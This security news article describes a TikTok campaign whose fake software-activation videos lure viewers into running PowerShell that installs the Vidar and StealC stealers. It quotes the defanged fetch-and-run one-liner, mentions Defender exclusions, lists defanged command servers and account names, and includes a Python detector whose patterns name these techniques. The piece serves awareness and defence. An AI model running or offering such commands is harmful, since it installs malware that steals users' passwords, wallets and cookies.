Cybercriminals are now using popular TikTok videos to spread dangerous malware called Vidar and StealC. This marks a new trend in social engineering attacks.
The attackers create videos that look like helpful guides. They claim to show viewers how to unlock premium features or activate software such as Windows, Microsoft Office, CapCut, and Spotify. In reality, these videos trick viewers into running malicious PowerShell commands that infect their systems.
How the Attack Works
Unlike traditional methods that use phishing emails or infected websites, this campaign relies entirely on video content. The videos are often faceless and may be generated with AI. Because the videos themselves carry no malicious code, there is nothing on the TikTok platform for automated scanning to detect.
Viewers are asked to run a PowerShell command like:
iex (irm https://allaivo[.]me/spotify)
This command downloads and runs a remote script. The script hides itself in system folders and adds those folders to Windows Defender’s exclusion list to avoid detection. It then downloads the Vidar and StealC malware.
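As an added illustration (not code from the Trend Micro report or from the campaign), the following Python script shows how a defender could scan PowerShell script-block log text for the two behaviours described above: a download-and-execute one-liner such as iex (irm ...) and an Add-MpPreference exclusion. The sample log lines are constructed, and the example.invalid hostnames are placeholders.

```python
import re

# Constructed sample script-block log entries (Event ID 4104 style); only the
# first line reproduces the defanged command quoted in the article.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm https://allaivo[.]me/spotify)",
    "irm https://example.invalid/s.ps1 | iex",
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\svc"',
    "Get-ChildItem C:\\Users",
    "irm https://example.invalid/notes.txt -OutFile notes.txt",
]

# Execution verb and remote-fetch verb; either order counts (iex (irm ...) or irm ... | iex).
EXEC_VERB = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
FETCH_VERB = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.IGNORECASE)
# Adding a Defender exclusion is the second step the article describes.
DEFENDER_EXCLUSION = re.compile(
    r"\badd-mppreference\b.*-exclusion(path|process|extension)\b", re.IGNORECASE)
# URL pattern that tolerates defanged hosts such as allaivo[.]me.
URL_PATTERN = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def classify(script_block: str) -> list[str]:
    """Return the list of suspicious behaviours found in one script block."""
    findings = []
    # A fetch alone (e.g. -OutFile) or iex alone is not flagged; the pairing is.
    if EXEC_VERB.search(script_block) and FETCH_VERB.search(script_block):
        findings.append("remote-download-and-execute")
    if DEFENDER_EXCLUSION.search(script_block):
        findings.append("defender-exclusion-added")
    return findings


def extract_urls(script_block: str) -> list[str]:
    """Pull any URLs out of a script block for indicator triage."""
    return URL_PATTERN.findall(script_block)


def scan(blocks: list[str]) -> list[tuple[str, list[str]]]:
    """Return (script_block, findings) for every block with at least one finding."""
    hits = []
    for block in blocks:
        findings = classify(block)
        if findings:
            hits.append((block, findings))
    return hits


if __name__ == "__main__":
    for block, findings in scan(SAMPLE_SCRIPT_BLOCKS):
        print(findings, extract_urls(block), block)
```

In a real deployment the same checks would run over Event ID 4104 script-block entries or Sysmon process command lines rather than the constructed list.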
What the Malware Does
Once installed, the malware steals sensitive information such as:
- Saved passwords
- Cryptocurrency wallets
- Authentication cookies
It also connects to hidden command-and-control servers to send the stolen data. Vidar uses public platforms like Steam and Telegram to disguise its real network traffic.
For example, it hides data exchanges through:
- Steam profile: hxxps://steamcommunity[.]com/profiles/76561199846773220
- Telegram channel: hxxps://t[.]me/v00rd
Reach and Impact
Researchers at Trend Micro discovered several TikTok accounts involved, including:
- @gitallowed
- @zane.houghton
- @allaivo2
- @sysglow.wow
- @alexfixpc
- @digitaldreams771
One of these videos received over 500,000 views, 20,000 likes, and 100 comments, showing the scale of the campaign.
Victims of this malware risk losing personal data, banking credentials, and company access details. This could lead to account takeovers, fraud, and larger cyberattacks on businesses.
Protecting Yourself
This campaign shows how social media can be used to spread malware in new ways. The videos appear helpful, but they are designed to build trust and trick users into running dangerous commands.
Users should be cautious of any technical advice they see online, especially instructions that ask them to use PowerShell or download unknown software. If in doubt, always verify the source or consult an IT professional.